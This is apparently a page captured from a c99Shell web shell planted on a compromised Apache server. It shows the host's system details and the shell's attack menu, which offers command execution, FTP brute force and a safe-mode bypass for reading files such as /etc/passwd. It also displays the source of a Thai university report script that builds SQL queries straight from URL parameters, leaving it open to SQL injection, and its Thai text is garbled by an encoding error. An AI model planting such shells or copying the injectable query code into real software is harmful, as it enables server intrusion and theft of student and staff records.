!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/   drwxr-xr-x
Free 49.22 GB of 127.8 GB (38.52%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     detailData.php (3.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<meta name="viewport" content="width=device-width, initial-scale=1" charset="x-windows-874">

<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
<link rel="stylesheet"
          href="https://fonts.googleapis.com/css?family=Tangerine">
    <style>
      body {
        font-family: 'Kanit', sans-serif;
        font-size: 15px;
      }
    </style>
    
<script>
    $( function() {
        $( "#datepicker1" ).datepicker();
        $( "#datepicker2" ).datepicker();
    } );
</script>
<style type="text/css">
    @font-face {
        font-family: cha;
        src: url(/font/THSarabunNew.ttf);
    }
    html, body {
        padding:0px;
        margin:0px;
        height:100%;
        font-family: cha;
    }
</style>
<?php
include_once("classes/Crud.php");
$crud = new Crud();
$id=$_GET['id'];
$prodate1=$_GET['prodate1'];
$prodate2=$_GET['prodate2'];
$no=1;
$query "SELECT * FROM Officer WHERE officerCode='$id' ";
$result $crud->getData($query);
foreach(
$result as $key => $res){
        
$officerName=$res['officerName']." ".$res['officerSurname'];
}
?>
<table class="table table-striped">
          <thead class="thead-dark">
            <tr>
                <th colspan="7"><center>¢éÍÁÙÅ¡ÒÃãËé¤Ó»ÃÖ¡ÉҢͧ Í. <?=$officerName?> <br>ÃÐËÇèÒ§ Çѹ·Õè <?=DateThai($prodate1)?> ¶Ö§ <?=DateThai($prodate2)?> </center></th>
            </tr>
            <tr>
              <th class="text-center">ÅӴѺ</th>
              <th class="text-center">»Õ</th>
              <th class="text-center">¤ÃÑé§</th>
              <th class="text-center">à·ÍÁ</th>
              <th class="text-left">ÃÒª×è͹ѡÈÖ¡ÉÒ·Õèà¢éÒÃèÇÁ</th>
              <th class="text-left">¼Å¡ÒÃãËé¤Ó»ÃÖ¡ÉÒ</th>
              <th class="text-left">Çѹ·Õè</th>
              </tr>
          </thead>
          <?php
          $queryData 
"SELECT * FROM v_detailData WHERE userID='$id' AND proDate BETWEEN '$prodate1' AND '$prodate2' ";
          
$resultData $crud->getData($queryData);
          
?>
          <tbody>
              <?php
              
foreach($resultData as $key => $resData){

              
?>
              <tr>
               <td class="text-center"><?=$no?></td>
              <td class="text-center"><?=$resData['academic_year']?></td>
              <td class="text-center"><?=$resData['round']?></td>
              <td class="text-center"><?=$resData['term']?></td>
              <td class="text-left"><?=nl2br(convertName($resData['per1']).",".convertName($resData['per2']).",".convertName($resData['per3']).",".convertName($resData['per4']).",".convertName($resData['per5']).",".convertName($resData['per6']).",".convertName($resData['per7']).",".convertName($resData['per8']).",".convertName($resData['per9']).",".convertName($resData['per10']).",".convertName($resData['per11']).",".convertName($resData['per12']).",".convertName($resData['per13']).",".convertName($resData['per14']).",".convertName($resData['per15']).",".convertName($resData['per16']).",".convertName($resData['per17']).",".convertName($resData['per18']).",".convertName($resData['per19']).",".convertName($resData['per20']))?></td>
              <td class="text-left"><?=nl2br($resData['result'])?></td>
              <td class="text-left"><?=DateThai($resData['proDate'])?></td>
              </tr>
              <?php
              $no
++;
              }
              
?>
          </tbody>
</table>
<?php
function DateThai($strDate)
{
    
$strYear date("Y",strtotime($strDate))+543;
    
$strMonthdate("n",strtotime($strDate));
    
$strDaydate("j",strtotime($strDate));
    
$strHourdate("H",strtotime($strDate));
    
$strMinutedate("i",strtotime($strDate));
    
$strSecondsdate("s",strtotime($strDate));
    
$strMonthCut = Array("","Á.¤.","¡.¾.","ÁÕ.¤.","àÁ.Â.","¾.¤.","ÁÔ.Â.","¡.¤.","Ê.¤.","¡.Â.","µ.¤.","¾.Â.","¸.¤.");
    
$strMonthThai=$strMonthCut[$strMonth];
    return 
"$strDay $strMonthThai $strYear $strHour:$strMinute:$strSeconds";
}
function 
convertName($id)
{
    
$crud = new Crud();
    
$query "SELECT * FROM Student WHERE studentId='$id' ";
    
$result $crud->getData($query);
    foreach(
$result as $key => $res){
    
$studentName=$res['prefixName'].$res['studentName']." ".$res['studentSurname'];
    }
    return 
$studentName;
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.1461 ]--